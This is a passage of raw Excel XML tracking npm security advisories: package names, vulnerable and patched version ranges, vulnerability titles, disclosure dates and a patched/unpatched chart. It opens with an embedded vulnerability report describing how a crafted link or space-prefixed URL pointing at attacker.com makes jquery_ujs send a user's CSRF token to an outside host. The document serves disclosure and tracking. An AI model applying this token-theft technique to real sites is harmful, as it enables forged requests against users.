&lt;p&gt;The JQuery behavior can be found here and a similar bug in Zepto can be found here. In both these cases, weak regexes don&amp;#39;t match the URL and the framework fails open into assuming that the URL is same origin. Prefixing the URL with a space character is one way to break this regex, but the regexes are pretty weak and there are probably other ways as well.&lt;/p&gt;
&lt;p&gt;I&amp;#39;ll contact the JQuery/Zepto folks about fixing their regexes, but there are a few thing that could improve this in jquery_ujs as well.&lt;/p&gt;
&lt;p&gt;I don&amp;#39;t think a data attribute (data-cross-domain) should be able to force jquery_ujs to send the CSRF token.&lt;br&gt;
The href attribute should be accessed directly here rather than calling attr(&amp;quot;href&amp;quot;). When called directly, the browser does a lot to clean up the URL and make sure that it is well formed. This would address the space prefix issue.&lt;br&gt;
Some stronger protections could be added before calling CSRFProtection here.&lt;br&gt;
For links with data-method, but without data-remote, the origin isn&amp;#39;t even checked before adding a CSRF token to the form. This could even be exploited accidentally. Origin checking should be added here&lt;/p&gt;
&lt;p&gt;I haven&amp;#39;t seen a bulletproof way for comparing origins yet, but I&amp;#39;ve got a few ideas if you want to discuss it more. Let me know what you think.&lt;/p&gt;
&lt;p&gt;Thanks,&lt;br&gt;
Ben Toews&lt;br&gt;
GitHub Security&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>2015-03-03T18:42:54.912Z</t>
  </si>
  <si>
    <t>2015-06-16T19:21:31.440Z</t>
  </si>
  <si>
    <t xml:space="preserve">reported via email few months ago. initial email    Hello, I"ve playing getting Rails apps send CSRF tokens wrong domains found few problems. main motivation attacking site uses Content Security Policy. CSP enabled, attacker XSS vulnerability cannot simply inject inline JavaScript, abuse Rails features steal CSRF token.  scenario attacker inject arbitrary HTML response, simplest attack inject     Clicking link will trigger OPTIONS request attacker.com. attacker returns correct CORS headers, POST request containing user"s CSRF token will sent attacker.com.  second scenario, attacker able control href attribute anchor tag action attribute form tag will trigger data remote action. isn"t uncommon site building anchor form tags dynamically. case, attacker set href action Â« Â» https //attacker.comÂ« Â». will passed JQuery, will origin request.  JQuery behavior found similar bug Zepto found here. cases, weak regexes don"t match URL framework fails open assuming URL origin. Prefixing URL space character one break regex, regexes pretty weak probably ways well.  I"ll contact JQuery/Zepto folks fixing regexes, few thing improve jquery_ujs well.  don"t think data attribute (data cross domain) able force jquery_ujs send CSRF token. href attribute accessed directly rather calling attr(Â« Â»hrefÂ« Â»). When called directly, browser does lot clean URL sure formed. address space prefix issue. stronger protections added calling CSRFProtection here. links data method, without data remote, origin isn"t even checked adding CSRF token form. even exploited accidentally. Origin checking added  haven"t seen bulletproof comparing origins yet, I"ve few ideas want discuss more. Let know think.  Thanks, Ben Toews GitHub Security  </t>
  </si>
  <si>
    <t>/advisories/31</t>
  </si>
  <si>
    <t>2015-04-04T02:00:00+00:00</t>
  </si>
  <si>
    <t>semver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/semver</t>
  </si>
  <si>
    <t>&lt;4.3.2</t>
  </si>
  <si>
    <t>&gt;=4.3.2</t>
  </si>
  <si>
    <t>Verification Bypass</t>
  </si>
  <si>
    <t>/advisories/17</t>
  </si>
  <si>
    <t>2015-04-01T02:00:00+00:00</t>
  </si>
  <si>
    <t>jsonwebtoken</t>
  </si>
  <si>
    <t>https://www.npmjs.com/jsonwebtoken</t>
  </si>
  <si>
    <t>&lt;4.2.2</t>
  </si>
  <si>
    <t>&gt;=4.2.2</t>
  </si>
  <si>
    <t>/advisories/34</t>
  </si>
  <si>
    <t>2015-03-14T05:24:28+00:00</t>
  </si>
  <si>
    <t>serve-index</t>
  </si>
  <si>
    <t>https://www.npmjs.com/serve-index</t>
  </si>
  <si>
    <t>&lt;1.6.3</t>
  </si>
  <si>
    <t>&gt;=1.6.3</t>
  </si>
  <si>
    <t>VBScript Content Injection</t>
  </si>
  <si>
    <t>/advisories/24</t>
  </si>
  <si>
    <t>2015-01-22T17:33:48+00:00</t>
  </si>
  <si>
    <t>&lt;=0.3.2</t>
  </si>
  <si>
    <t>&gt;=0.3.3</t>
  </si>
  <si>
    <t>/advisories/23</t>
  </si>
  <si>
    <t>&lt;=0.3.3</t>
  </si>
  <si>
    <t>&gt;=0.3.4</t>
  </si>
  <si>
    <t>/advisories/40</t>
  </si>
  <si>
    <t>ungit</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ungit</t>
  </si>
  <si>
    <t>&lt;=0.8.4</t>
  </si>
  <si>
    <t>&gt;=0.9.0</t>
  </si>
  <si>
    <t>/advisories/33</t>
  </si>
  <si>
    <t>2015-01-19T06:00:00+00:00</t>
  </si>
  <si>
    <t>&lt;=2.0.0-rc7</t>
  </si>
  <si>
    <t>&gt;=2.0.0-rc8</t>
  </si>
  <si>
    <t>/advisories/35</t>
  </si>
  <si>
    <t>2015-01-13T22:50:48+00:00</t>
  </si>
  <si>
    <t>serve-static</t>
  </si>
  <si>
    <t>https://www.npmjs.com/serve-static</t>
  </si>
  <si>
    <t>&lt;1.6.5 || &gt;=1.7.0 &lt;1.7.2</t>
  </si>
  <si>
    <t>~1.6.5 || &gt;=1.7.2</t>
  </si>
  <si>
    <t>Hidden Directories Always Served</t>
  </si>
  <si>
    <t>/advisories/14</t>
  </si>
  <si>
    <t>2014-12-16T03:13:48+00:00</t>
  </si>
  <si>
    <t>inert</t>
  </si>
  <si>
    <t>https://www.npmjs.com/inert</t>
  </si>
  <si>
    <t>&lt;1.1.1</t>
  </si>
  <si>
    <t>Validation Bypass</t>
  </si>
  <si>
    <t>/advisories/26</t>
  </si>
  <si>
    <t>2014-12-03T13:00:00+00:00</t>
  </si>
  <si>
    <t>paypal-ipn</t>
  </si>
  <si>
    <t>https://www.npmjs.com/paypal-ipn</t>
  </si>
  <si>
    <t>/advisories/9</t>
  </si>
  <si>
    <t>2014-11-15T04:00:48+00:00</t>
  </si>
  <si>
    <t>fancy-server</t>
  </si>
  <si>
    <t>https://www.npmjs.com/fancy-server</t>
  </si>
  <si>
    <t>&lt;0.1.4</t>
  </si>
  <si>
    <t>&gt;=0.1.4</t>
  </si>
  <si>
    <t>/advisories/25</t>
  </si>
  <si>
    <t>2014-11-14T09:30:48+00:00</t>
  </si>
  <si>
    <t>nhouston</t>
  </si>
  <si>
    <t>https://www.npmjs.com/nhouston</t>
  </si>
  <si>
    <t>Content Injection</t>
  </si>
  <si>
    <t>/advisories/30</t>
  </si>
  <si>
    <t>2014-11-13T20:33:48+00:00</t>
  </si>
  <si>
    <t>&lt;1.4.1</t>
  </si>
  <si>
    <t>/advisories/42</t>
  </si>
  <si>
    <t>2014-11-12T19:45:48+00:00</t>
  </si>
  <si>
    <t>validator</t>
  </si>
  <si>
    <t>https://www.npmjs.com/validator</t>
  </si>
  <si>
    <t>&lt;3.22.1</t>
  </si>
  <si>
    <t>&gt;=3.22.1</t>
  </si>
  <si>
    <t>XSS Filter Bypass via Encoded URL</t>
  </si>
  <si>
    <t>/advisories/43</t>
  </si>
  <si>
    <t>2014-10-27T17:33:48+00:00</t>
  </si>
  <si>
    <t>Arbitrary JavaScript Execution</t>
  </si>
  <si>
    <t>/advisories/1</t>
  </si>
  <si>
    <t>2014-09-27T16:44:48+00:00</t>
  </si>
  <si>
    <t>bassmaster</t>
  </si>
  <si>
    <t>https://www.npmjs.com/bassmaster</t>
  </si>
  <si>
    <t>&lt;=1.5.1</t>
  </si>
  <si>
    <t>&gt;=1.5.2</t>
  </si>
  <si>
    <t>/advisories/32</t>
  </si>
  <si>
    <t>2014-09-12T15:06:33+00:00</t>
  </si>
  <si>
    <t>&lt; 0.8.4</t>
  </si>
  <si>
    <t>&gt;= 0.8.4</t>
  </si>
  <si>
    <t>No Charset in Content-Type Header</t>
  </si>
  <si>
    <t>/advisories/8</t>
  </si>
  <si>
    <t>2014-09-12T14:46:45+00:00</t>
  </si>
  <si>
    <t>express</t>
  </si>
  <si>
    <t>https://www.npmjs.com/express</t>
  </si>
  <si>
    <t>&lt;3.11 || &gt;= 4 &lt;4.5</t>
  </si>
  <si>
    <t>&gt;=3.11 &lt;4 || &gt;=4.5</t>
  </si>
  <si>
    <t>Denial-of-Service Extended Event Loop Blocking</t>
  </si>
  <si>
    <t>/advisories/28</t>
  </si>
  <si>
    <t>2014-08-06T17:10:23+00:00</t>
  </si>
  <si>
    <t>qs</t>
  </si>
  <si>
    <t>https://www.npmjs.com/qs</t>
  </si>
  <si>
    <t>&gt;= 1.x</t>
  </si>
  <si>
    <t>Denial-of-Service Memory Exhaustion</t>
  </si>
  <si>
    <t>/advisories/29</t>
  </si>
  <si>
    <t>2014-08-06T17:10:22+00:00</t>
  </si>
  <si>
    <t>CORS Token Disclosure</t>
  </si>
  <si>
    <t>/advisories/4</t>
  </si>
  <si>
    <t>2014-08-01T16:40:57+00:00</t>
  </si>
  <si>
    <t>crumb</t>
  </si>
  <si>
    <t>https://www.npmjs.com/crumb</t>
  </si>
  <si>
    <t>Potential for Script Injection</t>
  </si>
  <si>
    <t>/advisories/37</t>
  </si>
  <si>
    <t>2014-07-15T17:33:48+00:00</t>
  </si>
  <si>
    <t>syntax-error</t>
  </si>
  <si>
    <t>https://www.npmjs.com/syntax-error</t>
  </si>
  <si>
    <t>&lt; 1.1.1</t>
  </si>
  <si>
    <t>&gt;= 1.1.1</t>
  </si>
  <si>
    <t>Rosetta-Flash JSONP Vulnerability</t>
  </si>
  <si>
    <t>/advisories/12</t>
  </si>
  <si>
    <t>2014-07-08T17:33:48+00:00</t>
  </si>
  <si>
    <t>&lt; 6.1.0</t>
  </si>
  <si>
    <t>&gt;= 6.1.0</t>
  </si>
  <si>
    <t>/advisories/44</t>
  </si>
  <si>
    <t>2014-06-16T19:29:10+00:00</t>
  </si>
  <si>
    <t>yar</t>
  </si>
  <si>
    <t>https://www.npmjs.com/yar</t>
  </si>
  <si>
    <t>&lt;2.2.0</t>
  </si>
  <si>
    <t>/advisories/27</t>
  </si>
  <si>
    <t>2014-03-06T17:33:48+00:00</t>
  </si>
  <si>
    <t>printer</t>
  </si>
  <si>
    <t>https://www.npmjs.com/printer</t>
  </si>
  <si>
    <t>&lt;= 0.0.1</t>
  </si>
  <si>
    <t>&gt; 0.0.1</t>
  </si>
  <si>
    <t>File Descriptor Leak Can Cause DoS Vulnerability</t>
  </si>
  <si>
    <t>/advisories/11</t>
  </si>
  <si>
    <t>2014-02-14T17:33:48+00:00</t>
  </si>
  <si>
    <t>2.0.x || 2.1.x</t>
  </si>
  <si>
    <t>&gt;= 2.2.x</t>
  </si>
  <si>
    <t>/advisories/36</t>
  </si>
  <si>
    <t>2014-02-06T17:33:48+00:00</t>
  </si>
  <si>
    <t>&lt;0.2.5</t>
  </si>
  <si>
    <t>&gt;=0.2.5</t>
  </si>
  <si>
    <t>Heap Based Buffer Overflow</t>
  </si>
  <si>
    <t>/advisories/21</t>
  </si>
  <si>
    <t>2014-02-04T17:31:34+00:00</t>
  </si>
  <si>
    <t>libyaml</t>
  </si>
  <si>
    <t>https://www.npmjs.com/libyaml</t>
  </si>
  <si>
    <t>Multiple Content Injection Vulnerabilities</t>
  </si>
  <si>
    <t>/advisories/22</t>
  </si>
  <si>
    <t>2014-01-31T08:33:12+00:00</t>
  </si>
  <si>
    <t>/advisories/2</t>
  </si>
  <si>
    <t>2013-07-07T17:33:48+00:00</t>
  </si>
  <si>
    <t>codem-transcode</t>
  </si>
  <si>
    <t>https://www.npmjs.com/codem-transcode</t>
  </si>
  <si>
    <t>&lt;0.5.0</t>
  </si>
  <si>
    <t>&gt;=0.5.0</t>
  </si>
  <si>
    <t>Multiple XSS Filter Bypasses</t>
  </si>
  <si>
    <t>/advisories/41</t>
  </si>
  <si>
    <t>2013-07-05T19:29:10+00:00</t>
  </si>
  <si>
    <t>methodOverride Middleware Reflected Cross-Site Scripting</t>
  </si>
  <si>
    <t>/advisories/3</t>
  </si>
  <si>
    <t>2013-07-01T01:08:59.63+00:00</t>
  </si>
  <si>
    <t>connect</t>
  </si>
  <si>
    <t>https://www.npmjs.com/connect</t>
  </si>
  <si>
    <t>&lt;=2.8.0</t>
  </si>
  <si>
    <t>&gt;=2.8.1</t>
  </si>
  <si>
    <t>Deserialization Code Execution</t>
  </si>
  <si>
    <t>/advisories/16</t>
  </si>
  <si>
    <t>2013-06-23T22:23:50.005+00:00</t>
  </si>
  <si>
    <t>js-yaml</t>
  </si>
  <si>
    <t>https://www.npmjs.com/js-yaml</t>
  </si>
  <si>
    <t>&lt;  2.0.5</t>
  </si>
  <si>
    <t>&gt;= 2.0.5</t>
  </si>
  <si>
    <t>/advisories/20</t>
  </si>
  <si>
    <t>2013-05-15T22:30:05.853+00:00</t>
  </si>
  <si>
    <t>libnotify</t>
  </si>
  <si>
    <t>https://www.npmjs.com/libnotify</t>
  </si>
  <si>
    <t>/advisories/13</t>
  </si>
  <si>
    <t>2013-05-15T22:14:38.178+00:00</t>
  </si>
  <si>
    <t>hubot-scripts</t>
  </si>
  <si>
    <t>https://www.npmjs.com/hubot-scripts</t>
  </si>
  <si>
    <t>&lt;= 2.4.3</t>
  </si>
  <si>
    <t>&gt; 2.4.3</t>
  </si>
  <si>
    <t>Unauthenticated Remote Command Injection</t>
  </si>
  <si>
    <t>/advisories/7</t>
  </si>
  <si>
    <t>2013-05-06T17:33:48+00:00</t>
  </si>
  <si>
    <t>ep_imageconvert</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ep_imageconvert</t>
  </si>
  <si>
    <t>&lt;=0.0.2</t>
  </si>
  <si>
    <t>API Admin Auth Weakness</t>
  </si>
  <si>
    <t>/advisories/38</t>
  </si>
  <si>
    <t>2013-03-07T21:52:30.192+00:00</t>
  </si>
  <si>
    <t>tomato</t>
  </si>
  <si>
    <t>https://www.npmjs.com/tomato</t>
  </si>
  <si>
    <t>&lt;= 0.0.5</t>
  </si>
  <si>
    <t>&gt;= 0.0.6</t>
  </si>
  <si>
    <t>Reported Issues</t>
  </si>
  <si>
    <t>Patched</t>
  </si>
  <si>
    <t>Unpatched</t>
  </si>
  <si>
    <t>Column1</t>
  </si>
  <si>
    <t>disclosedAt</t>
  </si>
  <si>
    <t>createdAt</t>
  </si>
  <si>
    <t>Yow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</si>
</sst>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6" formatCode="yyyy\-mm\-dd"/>
  </numFmts>
  <fonts count="2" x14ac:knownFonts="1">
    <font>
      <sz val="12"/>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1"/>
        <bgColor theme="1"/>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2" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="6" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="164" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="166" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="166" fontId="1" fillId="2" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="166" fontId="0" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="166" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="2" fontId="1" fillId="2" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="2" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="2" fontId="0" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="2"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Status of MODULES ISSUES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ofPieChart>
        <c:ofPieType val="bar"/>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Lbls>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dLbl>
            <c:dLbl>
              <c:idx val="1"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="0.0324900908123617"/>
                  <c:y val="-0.02772443963104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09852593949636"/>
                      <c:h val="0.1321731281599"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="2"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="0.0324810703532789"/>
                  <c:y val="-0.1557686158309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0555842995962223"/>
                  <c:y val="-0.09364125425430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tx>
                <c:rich>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r>
                      <a:rPr lang="en-US" sz="1600"/>
                      <a:t>Not Patched
</a:t>
                    </a:r>
                    <a:fld id="{7A5E1918-8B47-2248-A8BE-240F6852170C}" type="PERCENTAGE">
                      <a:rPr lang="en-US" sz="1600"/>
                      <a:pPr>
                        <a:defRPr sz="1600"/>
                      </a:pPr>
                      <a:t>[PERCENTAGE]</a:t>
                    </a:fld>
                    <a:endParaRPr lang="en-US" sz="1600"/>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out!$A$609:$A$612</c:f>
              <c:strCache>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>Patched</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>High</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Medium</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Low</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>out!$B$609:$B$612</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>281.0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>238.0</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>68.0</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>5.0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:dLblPos val="inEnd"/>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="1"/>
          <c:showSerName val="0"/>
          <c:showPercent val="1"/>
          <c:showBubbleSize val="0"/>
          <c:showLeaderLines val="1"/>
        </c:dLbls>
        <c:gapWidth val="100"/>
        <c:splitType val="val"/>
        <c:splitPos val="25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151191</xdr:colOff>
      <xdr:row>608</xdr:row>
      <xdr:rowOff>133249</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>7</xdr:col>
      <xdr:colOff>780143</xdr:colOff>
      <xdr:row>624</xdr:row>
      <xdr:rowOff>36285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2"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A27" zoomScale="210" zoomScaleNormal="210" workbookViewId="0">
      <selection activeCell="A36" sqref="A36"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="16.83203125" customWidth="1"/>
    <col min="3" max="3" width="11.6640625" customWidth="1"/>
    <col min="4" max="4" width="13.6640625" customWidth="1"/>
    <col min="5" max="5" width="12.1640625" customWidth="1"/>
    <col min="6" max="6" width="17.5" customWidth="1"/>
    <col min="7" max="7" width="15.5" customWidth="1"/>
    <col min="10" max="10" width="14.83203125" customWidth="1"/>
    <col min="12" max="12" width="28.5" customWidth="1"/>
    <col min="13" max="13" width="30.83203125" bestFit="1" customWidth="1"/>
    <col min="14" max="14" width="12.6640625" hidden="1" customWidth="1"/>
    <col min="15" max="15" width="12.6640625" style="16" customWidth="1"/>
    <col min="16" max="16" width="11.83203125" hidden="1" customWidth="1"/>
    <col min="17" max="17" width="11.83203125" style="16" customWidth="1"/>
    <col min="18" max="18" width="11.83203125" style="20" customWidth="1"/>
    <col min="20" max="20" width="16.6640625" customWidth="1"/>
    <col min="21" max="21" width="12.83203125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:22" x14ac:dyDescent="0.2">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="2" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="2" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="2" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="2" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="2" t="s">
        <v>6</v>
      </c>
      <c r="H1" s="2" t="s">
        <v>7</v>
      </c>
      <c r="I1" s="2" t="s">
        <v>8</v>
      </c>
      <c r="J1" s="2" t="s">
        <v>9</v>
      </c>
      <c r="K1" s="2" t="s">
        <v>10</v>
      </c>
      <c r="L1" s="2" t="s">
        <v>3372</v>
      </c>
      <c r="M1" s="2" t="s">
        <v>11</v>
      </c>
      <c r="N1" s="2" t="s">
        <v>12</v>
      </c>
      <c r="O1" s="14" t="s">
        <v>3374</v>
      </c>
      <c r="P1" s="2" t="s">
        <v>13</v>
      </c>
      <c r="Q1" s="14" t="s">
        <v>3373</v>
      </c>
      <c r="R1" s="17" t="s">
        <v>3375</v>
      </c>
      <c r="S1" s="2" t="s">
        <v>14</v>
      </c>
      <c r="T1" s="2" t="s">
        <v>15</v>
      </c>
      <c r="U1" s="2" t="s">
        <v>16</v>
      </c>
      <c r="V1" s="6" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="2" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A2" s="3" t="s">
        <v>3163</v>
      </c>
      <c r="B2" s="4" t="s">
        <v>3164</v>
      </c>
      <c r="C2" s="4" t="s">
        <v>3165</v>
      </c>
      <c r="D2" s="4" t="s">
        <v>3166</v>
      </c>
      <c r="E2" s="4" t="s">
        <v>3167</v>
      </c>
      <c r="F2" s="4" t="s">
        <v>3168</v>
      </c>
      <c r="G2" s="4" t="s">
        <v>3169</v>
      </c>
      <c r="H2" s="4">
        <v>6.5</v>
      </c>
      <c r="I2" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J2" s="4" t="s">
        <v>3170</v>
      </c>
      <c r="K2" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L2" s="4">
        <f>IF(out!$G2="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M2" s="5" t="s">
        <v>3171</v>
      </c>
      <c r="N2" s="12" t="s">
        <v>3172</v>
      </c>
      <c r="O2" s="13" t="str">
        <f>LEFT(N2,10)</f>
        <v>2015-03-03</v>
      </c>
      <c r="P2" s="13" t="s">
        <v>3173</v>
      </c>
      <c r="Q2" s="13" t="str">
        <f>LEFT(P2,10)</f>
        <v>2015-06-16</v>
      </c>
      <c r="R2" s="18">
        <f>DATEDIF(O2,Q2,"d")</f>
        <v>105</v>
      </c>
      <c r="S2" s="4"/>
      <c r="T2" s="4"/>
      <c r="U2" s="4" t="s">
        <v>3174</v>
      </c>
      <c r="V2" s="7"/>
    </row>
    <row r="3" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A3" s="3" t="s">
        <v>923</v>
      </c>
      <c r="B3" s="4" t="s">
        <v>924</v>
      </c>
      <c r="C3" s="4" t="s">
        <v>925</v>
      </c>
      <c r="D3" s="4" t="s">
        <v>926</v>
      </c>
      <c r="E3" s="4" t="s">
        <v>927</v>
      </c>
      <c r="F3" s="4" t="s">
        <v>928</v>
      </c>
      <c r="G3" s="4" t="s">
        <v>929</v>
      </c>
      <c r="H3" s="4">
        <v>7.5</v>
      </c>
      <c r="I3" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J3" s="4" t="s">
        <v>930</v>
      </c>
      <c r="K3" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L3" s="4">
        <f>IF(out!$G3="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M3" s="5" t="s">
        <v>931</v>
      </c>
      <c r="N3" s="12" t="s">
        <v>932</v>
      </c>
      <c r="O3" s="13" t="str">
        <f t="shared" ref="O3:O53" si="0">LEFT(N3,10)</f>
        <v>2017-12-08</v>
      </c>
      <c r="P3" s="12" t="s">
        <v>933</v>
      </c>
      <c r="Q3" s="13" t="str">
        <f t="shared" ref="Q3:Q53" si="1">LEFT(P3,10)</f>
        <v>2018-01-10</v>
      </c>
      <c r="R3" s="18">
        <f t="shared" ref="R3:R53" si="2">DATEDIF(O3,Q3,"d")</f>
        <v>33</v>
      </c>
      <c r="S3" s="4"/>
      <c r="T3" s="4" t="s">
        <v>895</v>
      </c>
      <c r="U3" s="4" t="s">
        <v>934</v>
      </c>
      <c r="V3" s="7" t="s">
        <v>897</v>
      </c>
    </row>
    <row r="4" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A4" s="3" t="s">
        <v>849</v>
      </c>
      <c r="B4" s="4" t="s">
        <v>850</v>
      </c>
      <c r="C4" s="4" t="s">
        <v>851</v>
      </c>
      <c r="D4" s="4" t="s">
        <v>852</v>
      </c>
      <c r="E4" s="4" t="s">
        <v>853</v>
      </c>
      <c r="F4" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G4" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H4" s="4"/>
      <c r="I4" s="4"/>
      <c r="J4" s="4" t="s">
        <v>854</v>
      </c>
      <c r="K4" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L4" s="4">
        <f>IF(out!$G4="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M4" s="5" t="s">
        <v>855</v>
      </c>
      <c r="N4" s="12" t="s">
        <v>856</v>
      </c>
      <c r="O4" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2017-12-08</v>
      </c>
      <c r="P4" s="12" t="s">
        <v>857</v>
      </c>
      <c r="Q4" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-01-23</v>
      </c>
      <c r="R4" s="18">
        <f t="shared" si="2"/>
        <v>46</v>
      </c>
      <c r="S4" s="4"/>
      <c r="T4" s="4" t="s">
        <v>858</v>
      </c>
      <c r="U4" s="4" t="s">
        <v>859</v>
      </c>
      <c r="V4" s="7" t="s">
        <v>860</v>
      </c>
    </row>
    <row r="5" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A5" s="3" t="s">
        <v>874</v>
      </c>
      <c r="B5" s="4" t="s">
        <v>875</v>
      </c>
      <c r="C5" s="4" t="s">
        <v>876</v>
      </c>
      <c r="D5" s="4" t="s">
        <v>877</v>
      </c>
      <c r="E5" s="4" t="s">
        <v>878</v>
      </c>
      <c r="F5" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G5" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H5" s="4">
        <v>7.5</v>
      </c>
      <c r="I5" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J5" s="4" t="s">
        <v>879</v>
      </c>
      <c r="K5" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L5" s="4">
        <f>IF(out!$G5="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M5" s="5" t="s">
        <v>880</v>
      </c>
      <c r="N5" s="12" t="s">
        <v>881</v>
      </c>
      <c r="O5" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2017-12-10</v>
      </c>
      <c r="P5" s="12" t="s">
        <v>882</v>
      </c>
      <c r="Q5" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-01-23</v>
      </c>
      <c r="R5" s="18">
        <f t="shared" si="2"/>
        <v>44</v>
      </c>
      <c r="S5" s="4"/>
      <c r="T5" s="4" t="s">
        <v>883</v>
      </c>
      <c r="U5" s="4" t="s">
        <v>884</v>
      </c>
      <c r="V5" s="7" t="s">
        <v>885</v>
      </c>
    </row>
    <row r="6" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A6" s="3" t="s">
        <v>886</v>
      </c>
      <c r="B6" s="4" t="s">
        <v>887</v>
      </c>
      <c r="C6" s="4" t="s">
        <v>888</v>
      </c>
      <c r="D6" s="4" t="s">
        <v>889</v>
      </c>
      <c r="E6" s="4" t="s">
        <v>890</v>
      </c>
      <c r="F6" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G6" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H6" s="4">
        <v>7.5</v>
      </c>
      <c r="I6" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J6" s="4" t="s">
        <v>891</v>
      </c>
      <c r="K6" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L6" s="4">
        <f>IF(out!$G6="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M6" s="5" t="s">
        <v>892</v>
      </c>
      <c r="N6" s="12" t="s">
        <v>893</v>
      </c>
      <c r="O6" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2017-12-08</v>
      </c>
      <c r="P6" s="12" t="s">
        <v>894</v>
      </c>
      <c r="Q6" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-01-23</v>
      </c>
      <c r="R6" s="18">
        <f t="shared" si="2"/>
        <v>46</v>
      </c>
      <c r="S6" s="4"/>
      <c r="T6" s="4" t="s">
        <v>895</v>
      </c>
      <c r="U6" s="4" t="s">
        <v>896</v>
      </c>
      <c r="V6" s="7" t="s">
        <v>897</v>
